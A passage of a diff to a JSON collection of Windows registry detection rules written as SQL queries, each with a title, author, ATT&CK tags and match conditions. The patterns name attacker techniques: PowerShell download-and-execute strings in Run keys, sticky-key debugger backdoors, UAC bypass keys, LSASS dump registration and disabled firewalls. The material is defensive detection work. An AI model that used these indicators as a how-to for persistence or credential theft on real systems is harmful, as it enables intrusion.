Baseline according to your environment" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh %' ESCAPE '\\' OR NewValue LIKE '%FromBase64String%' ESCAPE '\\' OR NewValue LIKE '%.DownloadFile(%' ESCAPE '\\' OR NewValue LIKE '%.DownloadString(%' ESCAPE '\\' OR NewValue LIKE '% -w hidden %' ESCAPE '\\' OR NewValue LIKE '% -w 1 %' ESCAPE '\\' OR NewValue LIKE '%-windowstyle hidden%' ESCAPE '\\' OR NewValue LIKE '%-window hidden%' ESCAPE '\\' OR NewValue LIKE '% -nop %' ESCAPE '\\' OR NewValue LIKE '% -encodedcommand %' ESCAPE '\\' OR NewValue LIKE '%-ExecutionPolicy Bypass%' ESCAPE '\\' OR NewValue LIKE '%Invoke-Expression%' ESCAPE '\\' OR NewValue LIKE '%IEX (%' ESCAPE '\\' OR NewValue LIKE '%Invoke-Command%' ESCAPE '\\' OR NewValue LIKE '%ICM -%' ESCAPE '\\' OR NewValue LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR NewValue LIKE '%IWR %' ESCAPE '\\' OR NewValue LIKE '% -noni %' ESCAPE '\\' OR NewValue LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\' OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\'))" ], - "filename": "registry_set_powershell_in_run_keys.yml" + "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml" }, { - "title": "DNS-over-HTTPS Enabled by Registry", - "id": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", - "status": "test", - "description": "Detects when a user enables DNS-over-HTTPS.\nThis 
can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", - "author": "Austin Songer", + "title": "CMSTP Execution Registry Event", + "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1140", - "attack.t1112" + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unlikely" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode' ESCAPE '\\' AND NewValue = 'secure') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\\\\Enabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" ], - "filename": "registry_set_dns_over_https_enabled.yml" + "filename": "registry_event_cmstp_execution_by_registry.yml" }, { - "title": "ScreenSaver Registry Key Set", - "id": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", - "status": "experimental", - "description": "Detects registry key established after 
masqueraded .scr file execution using Rundll32 through desk.cpl", - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "title": "OilRig APT Registry Persistence", + "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "status": "test", + "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Legitimate use of screen saver" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE%' ESCAPE '\\' AND NewValue LIKE '%.scr' ESCAPE '\\') AND NOT ((NewValue LIKE '%C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" ], - "filename": "registry_set_scr_file_executed_by_rundll32.yml" + "filename": "registry_event_apt_oilrig_mar18.yml" }, { - "title": "Registry Disable System Restore", - "id": "5de03871-5d46-4539-a82d-3aa992a69a83", - "status": "experimental", - "description": "Detects the modification of the registry to disable a system restore on the 
computer", - "author": "frack113", + "title": "New DLL Added to AppInit_DLLs Registry Key", + "id": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", + "status": "test", + "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", + "author": "Ilyas Ochkov, oscd.community, Tim Shelton", "tags": [ - "attack.impact", - "attack.t1490" + "attack.persistence", + "attack.t1546.010" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\') OR (NewName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR NewName LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" ], - "filename": "registry_set_disable_system_restore.yml" + "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" }, { - "title": "Add Port 
Monitor Persistence in Registry", - "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", + "title": "Atbroker Registry Change", + "id": "9577edbb-851f-4243-8c91-1d5b50c1a39b", "status": "experimental", - "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", - "author": "frack113", + "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", + "author": "Mateusz Wydra, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1218", "attack.persistence", - "attack.t1547.010" + "attack.t1547" ], "falsepositives": [ - "Unknown" + "Creation of non-default, legitimate at usage" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') 
AND (TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\' OR TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\atbroker.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\' AND NewValue = '(Empty)') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\')))" ], - "filename": "registry_set_add_port_monitor.yml" + "filename": "registry_event_susp_atbroker_change.yml" }, { - "title": "Usage of Renamed Sysinternals Tools - RegistrySet", - "id": "8023f872-3f1d-4301-a384-801889917ab4", - "status": "experimental", - "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "WINEKEY Registry Modification", + "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "status": "test", + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", + "author": "omkar72", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' 
ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" ], - "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" + "filename": "registry_event_runkey_winekey.yml" }, { - "title": "Potential Registry Persistence Attempt Via DbgManagedDebugger", - "id": "9827ae57-3802-418f-994b-d5ecf5cd974b", + "title": "Creation of a Local Hidden User Account by Registry", + "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", "status": "experimental", - "description": "Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. 
Which will get invoked when an application crashes", - "author": "frack113", + "description": "Sysmon registry detection of a local hidden user account.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1574" + "attack.t1136.001" ], "falsepositives": [ - "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\.NETFramework\\\\DbgManagedDebugger' ESCAPE '\\') AND NOT (NewValue LIKE '\"C:\\\\Windows\\\\system32\\\\vsjitdebugger.exe\" PID \\%d APPDOM \\%d EXTEXT \"\\%s\" EVTHDL \\%d' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_dbgmanageddebugger_persistence.yml" + "filename": "registry_event_add_local_hidden_user.yml" }, { - "title": "Disable Sysmon Event Logging Via Registry", - "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", - "status": "experimental", - "description": "Detects changes in Sysmon driver altitude. 
If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", - "author": "B.Talebi", + "title": "Windows Registry Trust Record Modification", + "id": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "status": "test", + "description": "Alerts on trust record modification within the registry, indicating usage of macros", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Legitimate driver altitude change to hide sysmon" + "Alerts on legitimate macro usage as well, will need to filter as appropriate" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%TrustRecords%' ESCAPE '\\')" ], - "filename": "registry_set_change_sysmon_driver_altitude.yml" + "filename": "registry_event_trust_record_modification.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS", - "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", + "title": "Leviathan Registry Key Activity", + "id": 
"70d43542-cd2d-483c-8f30-f16b436fd7db", + "status": "test", + "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", + "author": "Aidan Bracher", "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "falsepositives": [ - "Unknown" + "attack.persistence", + "attack.t1547.001" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" ], - "filename": "registry_set_lsa_disablerestrictedadmin.yml" + "filename": "registry_event_apt_leviathan.yml" }, { - "title": "Winlogon AllowMultipleTSSessions Enable", - "id": "f7997770-92c3-4ec9-b112-774c4ef96f96", + "title": "Sticky Key Like Backdoor Usage - Registry", + "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", "status": "experimental", - "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.privilege_escalation", "attack.persistence", - 
"attack.defense_evasion", - "attack.t1112" + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Legitimate use of the multi session functionality" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AllowMultipleTSSessions' ESCAPE '\\' AND NewValue LIKE '%DWORD (0x00000001)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" ], - 
"filename": "registry_set_winlogon_allow_multiple_tssessions.yml" + "filename": "registry_event_stickykey_like_backdoor.yml" }, { - "title": "Disable Privacy Settings Experience in Registry", - "id": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", - "status": "experimental", - "description": "Detects registry modifications that disable Privacy Settings Experience", - "author": "frack113", + "title": "Suspicious Camera and Microphone Access", + "id": "62120148-6b7a-42be-8b91-271c04e281a3", + "status": "test", + "description": "Detects Processes accessing the camera and microphone from suspicious folder", + "author": "Den Iuzvyk", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.collection", + "attack.t1125", + "attack.t1123" ], "falsepositives": [ - "Legitimate admin script" + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE\\\\DisablePrivacyExperience' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR 
TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" ], - "filename": "registry_set_disable_privacy_settings_experience.yml" + "filename": "registry_event_susp_mic_cam_access.yml" }, { - "title": "Allow RDP Remote Assistance Feature", - "id": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", - "status": "experimental", - "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", - "author": "frack113", + "title": "RedMimicry Winnti Playbook Registry Manipulation", + "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "status": "test", + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", "attack.t1112" ], "falsepositives": [ - "Legitimate use of the feature (alerts should be investigated either way)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\fAllowToGetHelp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" ], - "filename": "registry_set_allow_rdp_remote_assistance_feature.yml" + "filename": "registry_event_redmimicry_winnti_reg.yml" }, { - "title": "Suspicious Application Allowed Through Exploit Guard", - "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", + "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", + "id": "55e29995-75e7-451a-bef0-6225e2f13597", "status": "experimental", - "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass 
controlled folder settings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" ], - "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" + "filename": "registry_event_silentprocessexit_lsass.yml" }, { - "title": "Disable Windows Firewall by Registry", - "id": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", - "status": "experimental", - "description": "Detect set EnableFirewall to 0 to disable the windows firewall", - "author": "frack113", + "title": "Shell Open Registry Keys Manipulation", + "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "status": "test", + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC 
Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1546.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\StandardProfile\\\\EnableFirewall' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\DomainProfile\\\\EnableFirewall' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))))" ], - "filename": "registry_set_disable_windows_firewall.yml" + "filename": "registry_event_shell_open_keys_manipulation.yml" }, { - "title": "Disable Microsoft Defender Firewall via Registry", - "id": "974515da-6cc5-4c95-ae65-f97f9150ec7f", + "title": "Esentutl Volume Shadow Copy Service Keys", + "id": "5aad0995-46ab-41bd-a9ff-724f41114971", "status": "test", - "description": "Adversaries may disable or modify system 
